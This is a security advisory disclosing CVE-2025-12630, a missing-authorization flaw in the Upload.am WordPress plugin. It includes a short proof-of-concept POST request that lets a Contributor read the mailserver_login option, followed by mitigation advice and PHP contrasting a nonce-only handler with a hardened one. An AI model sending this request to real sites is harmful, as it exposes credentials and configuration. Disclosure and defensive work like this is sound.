# WordPress Upload.am – Contributor+ Arbitrary Option Disclosure (CVE-2025-12630)

**Author:** Beatriz Fresno Naumova (beafn28)

**Date:** 29/09/2025

**Vendor:** Upload.am

**Product:** Upload.am File Hosting VPN (WordPress Plugin)

**Versions affected:** < 1.0.1

**Component:** AJAX request handler – option retrieval

**CWE:** CWE-862 – Missing Authorization

**OWASP:** A5 – Broken Access Control

**Attack type:** Remote

**Impact:** Information Disclosure

### Description

The Upload.am File Hosting VPN WordPress plugin versions prior to 1.0.1 contain a missing authorization vulnerability in an AJAX request handler.\
The affected endpoint does not perform a proper capability check, allowing authenticated users with low privileges (such as **Contributor**) to retrieve arbitrary WordPress site options.

This lack of authorization enforcement enables unauthorized access to sensitive configuration values that should be restricted to administrative roles.

### Impact

**Primary impact:** Information disclosure of WordPress site options.

**Consequences:**

* Exposure of sensitive configuration data
* Facilitation of further attacks through reconnaissance
* Increased risk of privilege escalation or targeted exploitation

### Attack Details

* **Attack Vector (AV):** Network (N)
* **Attack Complexity (AC):** Low (L)
* **Privileges Required (PR):** Low (L)
* **User Interaction (UI):** None (N)
* **Scope (S):** Unchanged (U)
* **Confidentiality (C):** Low (L)
* **Integrity (I):** None (N)
* **Availability (A):** None (N)

**CVSS v3.1 Vector:**\
`CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N`

**CVSS v3.1 Base Score:** 4.9 (Medium)

### POC

1. As a Contributor+ user, open the new post screen: `/wp-admin/post-new.php`
2. View the page source and search the code for `var uploadAmSettings`
3. Use the nonce found there to send the following POST request:

```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_logged_in_xxx=value

action=upload_am_get_option&option_name=mailserver_login&nonce=VALID_NONCE_HERE
```

The response contains the value of the `mailserver_login` option.

### Mitigation

* **Enforce capability checks:** Validate user permissions using `current_user_can()` in all AJAX handlers.
* **Least privilege enforcement:** Prevent contributor-level users from accessing site-wide configuration options.
* **Proper error handling:** Return `403 Forbidden` responses for unauthorized access attempts.
* **Security testing:** Add regression tests to ensure authorization checks are enforced on all endpoints.
* **Code audit:** Review similar AJAX handlers for repeated authorization flaws.
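As an added illustration (not the Upload.am plugin's own code), a hypothetical WordPress AJAX handler for the `upload_am_get_option` action in the nonce-only form beside a hardened form that applies the mitigations above; the nonce action string and the option allowlist are assumptions.

```php
<?php
// Added example, not the plugin's code. The handler shape follows the request
// shown in the PoC: action=upload_am_get_option&option_name=...&nonce=...
// The nonce action string 'upload_am_nonce' is an assumption.

// Nonce-only handler. A nonce proves the request came from a page the user
// could load, not that the user may read arbitrary options, so any logged-in
// Contributor who can see the nonce passes this check.
function upload_am_get_option_unsafe() {
    check_ajax_referer( 'upload_am_nonce', 'nonce' );
    $name = sanitize_key( wp_unslash( $_POST['option_name'] ?? '' ) );
    wp_send_json_success( array( 'value' => get_option( $name ) ) );
}

// Hardened handler: capability check, option allowlist, 403 on refusal.
function upload_am_get_option_safe() {
    check_ajax_referer( 'upload_am_nonce', 'nonce' );

    // Site-wide configuration belongs to administrators (least privilege).
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
    }

    // Only options the plugin itself owns may be read (assumed option names);
    // core options such as mail server credentials are never reachable.
    $allowed = array( 'upload_am_api_key', 'upload_am_endpoint' );
    $name    = sanitize_key( wp_unslash( $_POST['option_name'] ?? '' ) );
    if ( ! in_array( $name, $allowed, true ) ) {
        wp_send_json_error( array( 'message' => 'Option not permitted' ), 403 );
    }

    wp_send_json_success( array( 'value' => get_option( $name ) ) );
}

// Register only the hardened handler. No wp_ajax_nopriv_ hook is added, so
// unauthenticated requests never reach it; the capability check then
// restricts authenticated callers to administrators.
add_action( 'wp_ajax_upload_am_get_option', 'upload_am_get_option_safe' );
```

A regression test for this handler logs in as a Contributor, posts a valid nonce with `option_name=mailserver_login`, and asserts a 403 response with no option value in the body.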

### Discoverer

Beatriz Fresno Naumova (beafn28)

### References

* **CVE:** <https://www.cve.org/CVERecord?id=CVE-2025-12630>
* **WPSCAN:** [531537f1-5547-4b0f-9e11-3f8a0b2589f5](https://wpscan.com/vulnerability/531537f1-5547-4b0f-9e11-3f8a0b2589f5/)
* **NIST:** <https://nvd.nist.gov/vuln/detail/CVE-2025-12630>
